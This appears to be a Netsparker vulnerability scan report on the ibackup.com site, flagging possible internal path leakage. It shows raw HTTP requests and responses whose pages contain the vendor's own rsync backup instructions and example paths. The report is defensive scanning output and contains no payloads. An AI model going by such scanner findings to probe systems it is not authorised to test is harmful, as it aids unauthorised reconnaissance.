valign="bottom"><img src="images/obk_feed_top.jpg" width="676" height="34" /></td>     </tr>     <tr>      <td class="feedback_form"><!--feedback form-->       <form name="feedback" action="https://www.ibackup.com/qmanager/servlet/FeedbackServlet" target="_parent" method="post">        <input type='hidden' name='vemail' id= 'validateEmail' value=''>        <input type='hidden' name='invalidemail' value='' id='invEmail'>        <input type='hidden' name='invaliduser' value='' id='invUser'>        <br />        <table width="97%" border="0" align="center" cellpadding="10" cellspacing="0">         <tr>          <td colspan="2" valign="top"><span id="errorInfo" class="note"> </span></td>         </tr>         <tr>          <td valign="top">Email Address<br />           <img src="images/obk_spacer.gif" width="2" height="5" /><br />           <input name="EMAIL" id="EMAIL" type="text" size="40" maxlength = "50" onChange="STREAMNET.ibackup.emailVerify(document.feedback)"></td>          <td valign="top">IBackup Username<br />           <img src="images/obk_spacer.gif" width="2" height="5" /><br />           <input name="USERNAME" type="text" size="25" maxlength="25" id='userid' onchange="javascript:checkField();" /></td>         </tr>         <tr>          <td valign="top">First Name<br />           <img src="images/obk_spacer.gif" width="2" height="5" /><br />           <input name="FIRSTNAME" type="text" size="25" maxlength="50" /></td>          <td valign="top">Last Name<br />           <img src="images/obk_spacer.gif" width="2" height="5" /><br />           <input name="LASTNAME" type="text" size="25" maxlength="50"></td>         </tr>         <tr>          <td valign="top">Operating System<br />           <img src="images/obk_spacer.gif" width="2" height="5" /><br />           <select name="select1" size="1" id="select1" onchange="show();">            <option value="" selected>Select</option>            <option value="Microsoft Windows 7">Microsoft Windows 7</option>            <option value="Microsoft Windows Vista">Microsoft Windows Vista</option>            <option value="Microsoft Windows XP">Microsoft Windows XP</option>            <option value="Microsoft Windows 2000">Microsoft Windows 2000</option>            <option value="Microsoft Windows 2000 Server">Microsoft Windows 2000 Server</option>            <option value="Microsoft Windows 2003 Server">Microsoft Windows 2003 Server</option>            <option value="Microsoft Windows Millennium Edition">Microsoft Windows Millennium Edition</option>            <option value="Microsoft Windows NT">Microsoft Windows NT</option>            <option value="Microsoft Windows 98">Microsoft Windows 98</option>            <option value="Microsoft Windows 95">Microsoft Windows 95</option>            <option value="Linux">Linux [Redhat, Debian etc.]</option>            <option value="Mac">Mac OS X 10.4</option>            <option value="Mac OS">Mac OS Earlier Version</option>            <option value="Palm OS">Palm OS</option>            <option value="UNIX">UNIX [SUN, HP, IBM etc.]</option>            <option value="iOS 3.2">iOS 3.2</option>            <option value="iOS 4.0"..
		 
		
		
		[Possible] Internal Path Leakage (*nix)
		[Possible] Internal Path Leakage (*nix)  
		
		
			
Netsparker identified an internal path in the document. 
			
Impact 
	
	 There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.
	
	
		Error messages should be disabled. 
		Remove this kind of private data from the output. 
	 
External References 
	
		 
		
			
			
			
			
			
			
				
/home/mydata /home/mydata john@rsync4.ibackup.com::ibackup /usr/local/stunnel/stunnel.conf /usr/local/stunnel /etc/hosts.allow  
 
			Request 
			GET /online-backup-linux/ HTTP/1.1 Referer: http://www.ibackup.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 200 OK Date: Fri, 24 Jun 2011 01:53:02 GMT Server: Apache Last-Modified: Thu, 26 May 2011 06:22:38 GMT ETag: "73c184-5580-4dddf1ae" Accept-Ranges: bytes Content-Length: 21888 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Linux Backup, Unix Backup, Online Backup for Linux, Solaris and other Unix flavors, linux offsite backup, solaris offsite backup, rsync backup, IBackup for Linux, Online Storage, Online Backup, Internet Hard Drive , Online File Storage and Collaboration, Linux server backup</title> <link rel="stylesheet"  href="../includes/obk_style.css" type="text/css"> <script language="JavaScript" src="../includes/obk_AC_RunActiveContent.js"></script> <script language="JavaScript" src="/qmanager/common.js"></script> <script language="JavaScript" src="/qmanager/validateLinux11.js"></script> <script language="JavaScript" src="/qmanager/linux_divs.js"></script> <script language="JavaScript" src="../includes/obk_mm_menu.js"></script> <script language="JavaScript" src="../includes/obk_pmenu.js"></script> <script language="JavaScript" src="../includes/obk_dropDown.js"></script> <script language="JavaScript" src="/qmanager/outsideValidate.js"></script> <style type="text/css">   .opaqueLayer             {                 display:none;                 position:absolute;                 top:0px;                 left:0px;                 opacity:0.9;                 filter:alpha(opacity=80);                 background-color: #FFFFFF;                /* z-Index:1000; */             }   	.loadingLayer            {                 position:absolute;                 top:0px;                 left:0px;                 width:171px;                 height:66px;                 display:none;                 /* z-Index:1001; */                 border:0px solid black;                 /* background-color:#FFFFFF; */                 text-align:left;                 vertical-align:left;                 padding:10px;             } </style> <link rel="icon" href="/images/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon"  /> </head> <body> <div id="shadow" class="opaqueLayer" > </div> <div class="loadingLayer" id="loading"><center><img src="/images/ibk_loading_new.gif"  width="171" height="66"/></center></div> <script language="JavaScript1.2" type="text/javascript">mmLoadMenus();</script> <table width="100%" border="0" cellspacing="0" cellpadding="0">   <tr>     <td background="../images/obk_topbg.jpg"><table width="960" border="0" align="center" cellpadding="0" cellspacing="0">       <tr>         <td width="160"><a href="../index.html"><img src="../images/obk_logo.jpg" alt="IBackup - online backup and online storage" width="159" height="105" border="0" /></a></td>         <td align="right" valign="top"><a href="../feedback_new.htm"><img src="../images/obk_hd_support.jpg" alt="Support" width="161" height="50" border="0" /></a></td>       </tr>     </table></td>   </tr> </table> <table width="100%" background="../images/obk_inside_bg.jpg" border="0" cellpadding="0" cellspacing="0"><tr><td> 	<img src="../images/obk_spacer.gif" width="2" height="9" /><br />     <table width="960" border="0" align="center" cellpadding="0" cellspacing="0" id="main_menu">       <tr>         <td id="mn_home"><a href="../index.html"><img src="../images/obk_spacer.gif" alt="Home" width="46" height="40" border="0" /></a></td>         <td id="mn_sign"><a href="../qmanager/jsp/regterms_new.jsp"><img src="../images/obk_spacer.gif" alt="Sign up" width="108" height="40" border="0" /></a></td>         <td id="mn_price"><a href="../charginghelp_new.htm"><img src="../images/obk_spacer.gif" alt="Pricing Plans" width="141" height="40" border="0" /></a></td>         <td id="mn_prod"><a href="#"><img src="../images/obk_spacer.gif" alt="Products" width="112" height="40" border="0"  name="products" onmouseover="MM_showMenu(window.mm_menu_0313114926_0,0,40,null,'products');" onmouseout="MM_startTimeout()" /></a></td>         <td id="mn_down"><a href="../online-backup-downloads/"><img src="../images/obk_spacer.gif" alt="Downloads" width="131" height="40" border="0" /></a></td>         <td id="mn_secur"><a href="../online-backup-security/"><img src="../images/obk_spacer.gif" alt="Security" width="106" height="40" border="0" /></a></td>         <td id="mn_supp"><a href="../feedback_new.htm"><img src="../images/obk_spacer.gif" alt="Support" width="109" height="40" border="0" /></a></td>         <td id="mn_part"><a href="../online-backup-partners/"><img src="../images/obk_spacer.gif" alt="Partners" width="109" height="40" border="0" /></a></td>         <td id="mn_faq"><a href="../online-backup-faq/"><img src="../images/obk_spacer.gif" alt="FAQs" width="98" height="40" border="0" /></a></td>       </tr>     </table>     <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">   <tr>   	<td width="440" valign="top"><img src="../images/obk_banr_baclin1.jpg" width="440" height="356" border="0" /></td>     <td background="../images/obk_banr_baclin2.jpg" valign="top" width="520" class="back_banner">     <table width="456" border="0" cellspacing="0" cellpadding="0">         <tr>           <td> </td>           <td><h1 class="banner_txt1">IBackup for UNIX and Linux using rsync</h1><img src="../images/obk_spacer.gif" alt="FAQs" width="2" height="20" border="0" /><br /><br /></td>           </tr>         <tr>           <td width="4"> </td>           <td width="452" align="right" valign="top"> </td>         </tr>         <tr>           <td> </td>           <td valign="top" class="banner_txt">           <ul style="font-size:13px;">               <li>Easily scriptable and customizable online backups </li>               <li>Encrypted data transfer </li>               <li>Incremental backup - sends  only the differences in the files across the Internet</li>               <li>Snapshots for historical view of data </li> 		  </ul></td>         </tr>         <tr>           <td align="right" valign="bottom"> </td>           <td align="left" valign="top" id="banner_download"><br />             <br />             <br />             <br />             <br />             <br />             <br /></td>         </tr>     </table>     </td>   </tr> </table> </td></tr></table> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr><td background="../images/obk_bacwin_bg2.jpg" style="background-repeat:repeat-x;"> <img src="../images/obk_spacer.gif" width="2" height="10" /><br />     <table width="900" border="0" align="center" cellpadding="0" cellspacing="0">       <tr>         <td valign="top" width="545">         <h2 class="txtblue"><img src="../images/obk_icon_linxfet.jpg" width="85" height="64" align="left" /><br />             rsync with IBackup Advantages</h2><br /> <br /> <ul class="listbullet">                           <li><span class="textsmlbk">Provides Snapshots<span class="style1"><span class="red">*</span><span class="style2"></span></span>, ability to restore from a historical view of backed up data</span><br />                           </li>                           <li><span class="textsmlbk">World-class security with RAID protected storage that is mirrored onto another set of devices for additional protection</span><br />                           </li>                           <li><span class="textsmlbk">Browser-based access to backed up data from anywhere</span><br />                           </li>                           <li><span class="textsmlbk">With Stunnel, provides 128-bit SSL encryption for data during transmission</span><br />                           </li>                           <li><span class="textsmlbk">Fast wire compressed incremental transfers for optimal resource utilization</span><br />                           </li>                           <li><span class="textsmlbk">Easily scriptable and customizable</span><br />           <br />             </li> </ul></td>         <td width="50"> </td>         <td valign="top" width="305" background="../images/obk_back_tab.jpg" class="back_tab"><br /><br /><br />     <table width="86%" border="0" align="center" cellpadding="5" cellspacing="0">         <tr>         	<td colspan="2"><img src="../images/obk_rellink.jpg" alt="Related Link" width="104" height="15" border="0" /></td>        	</tr>         <tr>           <td><img src="../images/obk_spacer.gif" width="4" height="1" /></td>           <td><img src="../images/obk_spacer.gif" width="4" height="1" /></td>         </tr>         <tr>           <td align="center"><img src="../images/obk_bullet1.jpg" width="13" height="12" /></td>           <td><a href="../online-backup-faq/faqqrsync.htm" class="rel_link">FAQs</a></td>         </tr>         <tr>           <td width="12%" align="center"> </td>           <td><img src="../images/obk_spacer.gif" width="4" height="60" /></td>         </tr>         </table>     <br /></td>       </tr>     </table></td></tr></table>         <table width="900" border="0" align="center" cellpadding="0" cellspacing="0">   <tr>     <td valign="top"></td>     </tr> </table>     <table width="900" border="0" align="center" cellpadding="0" cellspacing="0">       <tr>         <td><span class="lnktxt">Backup and Restore using rsync with IBackup</span><br />           <br /> To use this utility with your IBackup account, enter your IBackup Username or email and click 'GO'. This lists the steps involved in the backup or restore process.<br />           <br />           <br />           <strong>Username or email address:</strong>           <form method='post' action='http://www.ibackup.com/qmanager/jsp/rsync_server.jsp' name="form1" onSubmit="return validate(document.form1);return false;"><input type="hidden" id="errMsg" value=""><img src="../images/obk_spacer.gif" width="4" height="5" /><br />         <table width="100%" border="0" cellspacing="0" cellpadding="0">   <tr>     <td width="34%"><table width="300" border="0" align="left" cellpadding="0" cellspacing="0" bordercolor="#F5F5F5" bgcolor="#FFFFFF">                             						                                 <tr>                                <td width="10" valign="top"><img src="../images/obk_linux_l.jpg" width="10" height="50" /> </td>                                <td background="../images/obk_linux_bg.jpg" style="background-repeat:repeat-x"><input name="user" type="text" class="formfields" size="30" /></td>                                <td width="60" background="../images/obk_linux_bg.jpg" style="background-repeat:repeat-x"><input name="image" type="image" src="../images/obk_linux_go.jpg" align="absmiddle" width="59" height="24" hspace="2" vspace="0" border="0" /><!--<a href="#"><input name="image" type="image" src="../images/obk_linux_go.jpg" align="absmiddle" width="40" height="17" hspace="2" vspace="0" border="0" /></a>--></td>                                <td width="10" align="left" valign="top"><img src="../images/obk_linux_r.jpg" width="10" height="50" /></td>                              </tr>                     </table></td>     <td width="66%"><div id="showImage" style="display:none"><img src="../images/ibk_prog.gif" width="20" height="20" align="absmiddle"></div><span id="errorInfo" class="note"></span></td>   </tr> </table>                          </form>                          </td>       </tr>       <tr><td><br /><br /><hr /><br /></td></tr>       </table>     <span id="linuxInfo">       <table width="900" border="0" align="center" cellpadding="0" cellspacing="0">       <tr>         <td><p><b>Find below an example of the steps involved in the backup or restore process. To get the exact syntax to be used for your account, enter the email id or username in the box above.</b></p></td>       </tr>       <tr>         <td><p>Install rsync, if it is not already installed on your UNIX or Linux computer from rsync's website: <a href="http://rsync.samba.org" target="_blank" class="lnktxt">http://rsync.samba.org</a><br />           <br /> To backup a directory to your IBackup account, run the following command from the shell: <br /> <br /> <span class="lnkmore">$ rsync -r -v -z -t <your_directory> <ibackup username>@rsync4.ibackup.com::ibackup</span><br /> <br /> For example, to backup the directory /home/mydata to your IBackup account with the username say john, you would run:<br /> <br /> <span class="lnkmore">$ rsync -r -v -z -t /home/mydata john@rsync4.ibackup.com::ibackup</span><br /> <br /> You are prompted to enter your IBackup password.<br /> <br /> If you do not wish to be prompted for a password, then set the following shell variable to your IBackup password and run the rsync command: <br /> <br /> <span class="lnkmore">$ export RSYNC_PASSWORD=<your ibackup password></span><br /> <br />
		 
		
		
		
			
				
					
						- /online-backup-faq/faqqrsync.htm
						
					 
				 
			
			
			
			
			
			
				
/usr/local/mysql_sample_database /home/backup  
 
			Request 
			GET /online-backup-faq/faqqrsync.htm HTTP/1.1 Referer: http://www.ibackup.com/online-backup-resources/index.html User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 200 OK Date: Fri, 24 Jun 2011 01:53:03 GMT Server: Apache Last-Modified: Thu, 26 May 2011 05:35:29 GMT ETag: "3502bb-a7c0-4ddde6a1" Accept-Ranges: bytes Content-Length: 42944 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>FAQ - IBackup for Linux/Unix</title> <link rel="stylesheet"  href="../includes/obk_style.css" type="text/css"> <script language="JavaScript" src="../includes/obk_AC_RunActiveContent.js"></script> <script language="JavaScript" src="../includes/obk_mm_menu.js"></script> <script language="JavaScript" src="../includes/obk_pmenu.js"></script> <script language="JavaScript" src="../includes/obk_dropDown.js"></script> <script language="JavaScript" src="/qmanager/common.js"></script> <script language="JavaScript" src="/qmanager/validateLinux22.js"></script> <link rel="icon" href="/images/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon"  /> </head> <body> <script language="JavaScript1.2" type="text/javascript">mmLoadMenus();</script> <table width="100%" border="0" cellspacing="0" cellpadding="0">   <tr>     <td background="../images/obk_topbg.jpg"><table width="960"  border="0" align="center" cellpadding="0" cellspacing="0">         <tr>           <td width="160"><a href="../index.html"><img src="../images/obk_logo.jpg" alt="IBackup - online backup and online storage" width="159" height="105" border="0" /></a></td>           <td align="right" valign="top"><a  href="../feedback_new.htm"><img src="../images/obk_hd_support.jpg"  alt="Support" width="161" height="50" border="0" /></a></td>         </tr>       </table></td>   </tr> </table> <table width="100%" background="../images/obk_bacwin_bg.jpg" border="0" cellpadding="0" cellspacing="0">   <tr>     <td><img src="../images/obk_spacer.gif" width="2" height="9" /><br />       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0" id="main_menu">         <tr>           <td id="mn_home"><a href="/index.html"><img src="../images/obk_spacer.gif" alt="Home" width="46" height="40" border="0" /></a></td>           <td id="mn_sign"><a href="/qmanager/jsp/regterms_new.jsp"><img src="../images/obk_spacer.gif" alt="Sign up" width="108" height="40" border="0" /></a></td>           <td id="mn_price"><a href="/charginghelp_new.htm"><img src="../images/obk_spacer.gif" alt="Pricing Plans" width="141" height="40" border="0" /></a></td>           <td id="mn_prod"><a href="#"><img src="../images/obk_spacer.gif" alt="Products" width="112" height="40" border="0"  name="products" onmouseover="MM_showMenu(window.mm_menu_0313114926_0,0,40,null,'products');" onmouseout="MM_startTimeout()" /></a></td>           <td id="mn_down"><a href="/online-backup-downloads"><img src="../images/obk_spacer.gif" alt="Downloads" width="131" height="40" border="0" /></a></td>           <td id="mn_secur"><a href="/online-backup-security"><img src="../images/obk_spacer.gif" alt="Security" width="106" height="40" border="0" /></a></td>           <td id="mn_supp"><a href="/feedback_new.htm"><img src="../images/obk_spacer.gif" alt="Support" width="109" height="40" border="0" /></a></td>           <td id="mn_part"><a href="/online-backup-partners"><img src="../images/obk_spacer.gif" alt="Partners" width="109" height="40" border="0" /></a></td>           <td id="mn_faq"><a href="/online-backup-faq"><img src="../images/obk_spacer.gif" alt="FAQs" width="98" height="40" border="0" /></a></td>         </tr>       </table>       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">         <tr>           <td background="../images/obk_banr_confirm.jpg" valign="top" class="backwin_confirm_banner"><table width="100%" border="0" cellspacing="0" cellpadding="0">               <tr>                 <td><h1>Frequently Asked Questions<a name="top"></a></h1></td>               </tr>             </table></td>         </tr>       </table></td>   </tr> </table> <table width="100%" border="0" cellpadding="0" cellspacing="0">   <tr>     <td background="../images/obk_subpag_bg.jpg" style="background-repeat:repeat-x;"><img src="../images/obk_spacer.gif" width="2" height="45" /><br />       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">         <tr>           <td valign="top" width="200"><div id="faq_list"> <span class="faq_head"><a href="index.html" class="faq_head">Online Backup</a></span>             <ul class="listbullet">               <li><a href="index.html" class="rel_link">IBackup                  for Windows</a></li>               <li><a href="faqq_ibackup_mac.htm" class="rel_link">IBackup                  for Mac </a></li>               <li><a href="ibackup-for-iphone-faq.htm" class="rel_link">IBackup                  for iPhone </a></li>               <li><a href="faqq6n.htm" class="rel_link">Snapshots</a></li>               <li><a href="faqqsql.htm" class="rel_link">SQL      Server Backup</a></li>               <li><a href="faqq93a.htm" class="rel_link">Exchange                  Server Backup</a></li>               <li><a href="faq_oracle.htm" class="rel_link">Oracle                  Server Backup</a></li>               <li><a href="faqsharepoint.htm" class="rel_link">SharePoint Server Backup</a></li>               <li><a href="faqqssb.htm" class="rel_link">System                  State Backup</a></li>               <li><a href="faqqrsync.htm" class="rel_link">IBackup                  for Linux<br />                 (Command Line Interface)</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="faqq2.htm" class="faq_head">Online Storage</a></span>             <ul class="listbullet">               <li><a href="faqq2.htm" class="rel_link">IBackup Drive</a></li>               <li><a href="faqq8n.htm" class="rel_link">IBackup Drive                  for Mac</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="faq_webacc.htm" class="faq_head">Web Interface</a></span><b>(Web-Manager)</b>             <ul class="listbullet">               <li><a href="faq_webacc.htm" class="rel_link">File/Folder Management</a></li>               <li><a href="faq_webfold.htm" class="rel_link">WebFolders</a></li>               <li><a href="faq_share.htm" class="rel_link">Share</a></li>               <li><a href="faq_subac.htm" class="rel_link">Sub-Accounts</a></li>               <li><a href="faq_acct.htm" class="rel_link">Account Maintenance</a></li>               <li><a href="faq_report.htm" class="rel_link">Reports</a></li>               <li><a href="faq_managebkpset.htm" class="rel_link">Web Based Backup<br />                 Management</a></li>             </ul>             <br />             <a href="faqq_vista.htm" class="faq_head"><br />               Guideline FAQs</a>             <ul class="listbullet">               <li><a href="faqq_vista.htm" class="rel_link">Windows 7 and Vista</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="fwl_ibwin.htm" class="faq_head">Firewall Guidance</a></span>             <ul class="listbullet">               <li><a href="fwl_ibwin.htm" class="rel_link">IBackup                  for Windows</a></li>               <li><a href="fwl_ibmac.htm" class="rel_link">IBackup                  for Mac</a></li>               <li><a href="fwl_ibdrive.htm" class="rel_link">IBackup Drive</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="faqq94.htm" class="faq_head">Security</a></span>             <ul class="listbullet">               <li><a href="faqq94.htm" class="rel_link">Security                  and Encryption</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="faqq96.htm" class="faq_head">Plans</a></span>             <ul class="listbullet">               <li><a href="faqq96.htm" class="rel_link">Subscription                  Plans</a></li>               <li><a href="faqq1.htm" class="rel_link">How                  do I decide which IBackup feature to use with my IBackup account?</a></li>               <li><a href="faqq92.htm" class="rel_link">Free                  Trial</a></li>               <li><a href="faqq97.htm" class="rel_link">Credit                  card Issues</a><br />                 <br />               </li>             </ul>             <span class="faq_head"><a href="faqq98.htm" class="faq_head">Miscellaneous</a></span><br />             <br />             <br />           </div></td>           <td width="25" class="faq_split"> </td>           <td width="680" valign="top" class="txtcontent"><TABLE WIDTH="100%" BORDER="0" CELLPADDING="0" CELLSPACING="0" class="txtcontent">               <TR>                 <TD valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0">                     <tr>                       <td width="5" class="txtcontent"> </td>                       <td class="txtcontent"><span class="lnkmore">IBackup for Linux/Unix(Command Line Interface)</span>                         <hr />                         <br />                         <p><span class="txtheader">Listed below are common queries relating to IBackup for Linux/Unix.<br>                           To get the exact syntax for your account, enter your username or email id.</span> <br>                         </p></td>                     </tr>                     <tr>                       <td> </td>                       <td><TABLE WIDTH="100%" BORDER="0" CELLSPACING="0" CELLPADDING="10">                           <FORM METHOD='post' ACTION='https://www.ibackup.com/qmanager/jsp/rsyncfaq_server.jsp' name="form1" onSubmit="return validate(document.form1); return false;">                             <input type="hidden" id="errMsg" value="">                             <TR>                               <TD width="503" class="note"><span id="errorInfo"></span></TD>                             </TR>                             <TR>                               <TD><table width="100%" border="0" cellspacing="0" cellpadding="3">                                   <tr>                                     <td width="33%" align="left"><SPAN CLASS="txtstrong"><B>Username or email address:</B></SPAN></td>                                     <td width="25%" align="left"><input name="user" id="user" type="text" size="25" /></td>                                     <td width="10%" align="left"><input name="submit" type="submit" class="formbutton" value='Submit' /></td>                                     <td width="32%" align="left"><div id="showImage" style="display:none"><img src="../images/ibk_prog.gif" width="20" height="20" align="absmiddle"></div></td>                                   </tr>                                 </table></TD>                             </TR>                           </FORM>                         </TABLE></td>                     </tr>                     <tr>                       <td class="txtcontent"> </td>                       <td class="txtcontent"><br></td>                     </tr>                     <tr>                       <td background="../images/ib_06_bg_ln.gif" class="txtcontent"> </td>                       <td background="../images/ib_06_bg_ln.gif" class="txtcontent"> </td>                     </tr>                     <tr>                       <td class="txtcontent"> </td>                       <td class="txtcontent"><span id="linuxInfo">                         <TABLE WIDTH="100%" BORDER="0" CELLPADDING="0" CELLSPACING="0" class="txtcontent">                           <TR>                             <TD valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0">                                 <tr>                                   <td class="txtcontent"> </td>                                   <td class="txtcontent"> </td>                                 </tr>                                 <tr>                                   <td> </td>                                   <td><span class="txtheader">Common Queries<br>                                     <br>                                     </span></td>                                 </tr>                                 <tr>                                   <td> </td>                                   <td><table width="100%" border="0" cellspacing="2" cellpadding="4">                                       <tr>                                         <td width="12"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                                         &l..
		 
		
		
		
			
				
					
						- /online-backup-linux/index.html
						
					 
				 
			
			
			
			
			
			
				
/home/mydata /home/mydata john@rsync4.ibackup.com::ibackup /usr/local/stunnel/stunnel.conf /usr/local/stunnel /etc/hosts.allow  
 
			Request 
			GET /online-backup-linux/index.html HTTP/1.1 Referer: http://www.ibackup.com/sitemap.htm User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 200 OK Date: Fri, 24 Jun 2011 01:54:08 GMT Server: Apache Last-Modified: Thu, 26 May 2011 06:22:38 GMT ETag: "73c184-5580-4dddf1ae" Accept-Ranges: bytes Content-Length: 21888 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Linux Backup, Unix Backup, Online Backup for Linux, Solaris and other Unix flavors, linux offsite backup, solaris offsite backup, rsync backup, IBackup for Linux, Online Storage, Online Backup, Internet Hard Drive , Online File Storage and Collaboration, Linux server backup</title> <link rel="stylesheet"  href="../includes/obk_style.css" type="text/css"> <script language="JavaScript" src="../includes/obk_AC_RunActiveContent.js"></script> <script language="JavaScript" src="/qmanager/common.js"></script> <script language="JavaScript" src="/qmanager/validateLinux11.js"></script> <script language="JavaScript" src="/qmanager/linux_divs.js"></script> <script language="JavaScript" src="../includes/obk_mm_menu.js"></script> <script language="JavaScript" src="../includes/obk_pmenu.js"></script> <script language="JavaScript" src="../includes/obk_dropDown.js"></script> <script language="JavaScript" src="/qmanager/outsideValidate.js"></script> <style type="text/css">   .opaqueLayer             {                 display:none;                 position:absolute;                 top:0px;                 left:0px;                 opacity:0.9;                 filter:alpha(opacity=80);                 background-color: #FFFFFF;                /* z-Index:1000; */             }   	.loadingLayer            {                 position:absolute;                 top:0px;                 left:0px;                 width:171px;                 height:66px;                 display:none;                 /* z-Index:1001; */                 border:0px solid black;                 /* background-color:#FFFFFF; */                 text-align:left;                 vertical-align:left;                 padding:10px;             } </style> <link rel="icon" href="/images/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon"  /> </head> <body> <div id="shadow" class="opaqueLayer" > </div> <div class="loadingLayer" id="loading"><center><img src="/images/ibk_loading_new.gif"  width="171" height="66"/></center></div> <script language="JavaScript1.2" type="text/javascript">mmLoadMenus();</script> <table width="100%" border="0" cellspacing="0" cellpadding="0">   <tr>     <td background="../images/obk_topbg.jpg"><table width="960" border="0" align="center" cellpadding="0" cellspacing="0">       <tr>         <td width="160"><a href="../index.html"><img src="../images/obk_logo.jpg" alt="IBackup - online backup and online storage" width="159" height="105" border="0" /></a></td>         <td align="right" valign="top"><a href="../feedback_new.htm"><img src="../images/obk_hd_support.jpg" alt="Support" width="161" height="50" border="0" /></a></td>       </tr>     </table></td>   </tr> </table> <table width="100%" background="../images/obk_inside_bg.jpg" border="0" cellpadding="0" cellspacing="0"><tr><td> 	<img src="../images/obk_spacer.gif" width="2" height="9" /><br />     <table width="960" border="0" align="center" cellpadding="0" cellspacing="0" id="main_menu">       <tr>         <td id="mn_home"><a href="../index.html"><img src="../images/obk_spacer.gif" alt="Home" width="46" height="40" border="0" /></a></td>         <td id="mn_sign"><a href="../qmanager/jsp/regterms_new.jsp"><img src="../images/obk_spacer.gif" alt="Sign up" width="108" height="40" border="0" /></a></td>         <td id="mn_price"><a href="../charginghelp_new.htm"><img src="../images/obk_spacer.gif" alt="Pricing Plans" width="141" height="40" border="0" /></a></td>         <td id="mn_prod"><a href="#"><img src="../images/obk_spacer.gif" alt="Products" width="112" height="40" border="0"  name="products" onmouseover="MM_showMenu(window.mm_menu_0313114926_0,0,40,null,'products');" onmouseout="MM_startTimeout()" /></a></td>         <td id="mn_down"><a href="../online-backup-downloads/"><img src="../images/obk_spacer.gif" alt="Downloads" width="131" height="40" border="0" /></a></td>         <td id="mn_secur"><a href="../online-backup-security/"><img src="../images/obk_spacer.gif" alt="Security" width="106" height="40" border="0" /></a></td>         <td id="mn_supp"><a href="../feedback_new.htm"><img src="../images/obk_spacer.gif" alt="Support" width="109" height="40" border="0" /></a></td>         <td id="mn_part"><a href="../online-backup-partners/"><img src="../images/obk_spacer.gif" alt="Partners" width="109" height="40" border="0" /></a></td>         <td id="mn_faq"><a href="../online-backup-faq/"><img src="../images/obk_spacer.gif" alt="FAQs" width="98" height="40" border="0" /></a></td>       </tr>     </table>     <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">   <tr>   	<td width="440" valign="top"><img src="../images/obk_banr_baclin1.jpg" width="440" height="356" border="0" /></td>     <td background="../images/obk_banr_baclin2.jpg" valign="top" width="520" class="back_banner">     <table width="456" border="0" cellspacing="0" cellpadding="0">         <tr>           <td> </td>           <td><h1 class="banner_txt1">IBackup for UNIX and Linux using rsync</h1><img src="../images/obk_spacer.gif" alt="FAQs" width="2" height="20" border="0" /><br /><br /></td>           </tr>         <tr>           <td width="4"> </td>           <td width="452" align="right" valign="top"> </td>         </tr>         <tr>           <td> </td>           <td valign="top" class="banner_txt">           <ul style="font-size:13px;">               <li>Easily scriptable and customizable online backups </li>               <li>Encrypted data transfer </li>               <li>Incremental backup - sends  only the differences in the files across the Internet</li>               <li>Snapshots for historical view of data </li> 		  </ul></td>         </tr>         <tr>           <td align="right" valign="bottom"> </td>           <td align="left" valign="top" id="banner_download"><br />             <br />             <br />             <br />             <br />             <br />             <br /></td>         </tr>     </table>     </td>   </tr> </table> </td></tr></table> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr><td background="../images/obk_bacwin_bg2.jpg" style="background-repeat:repeat-x;"> <img src="../images/obk_spacer.gif" width="2" height="10" /><br />     <table width="900" border="0" align="center" cellpadding="0" cellspacing="0">       <tr>         <td valign="top" width="545">         <h2 class="txtblue"><img src="../images/obk_icon_linxfet.jpg" width="85" height="64" align="left" /><br />             rsync with IBackup Advantages</h2><br /> <br /> <ul class="listbullet">                           <li><span class="textsmlbk">Provides Snapshots<span class="style1"><span class="red">*</span><span class="style2"></span></span>, ability to restore from a historical view of backed up data</span><br />                           </li>                           <li><span class="textsmlbk">World-class security with RAID protected storage that is mirrored onto another set of devices for additional protection</span><br />                           </li>                           <li><span class="textsmlbk">Browser-based access to backed up data from anywhere</span><br />                           </li>                           <li><span class="textsmlbk">With Stunnel, provides 128-bit SSL encryption for data during transmission</span><br />                           </li>                           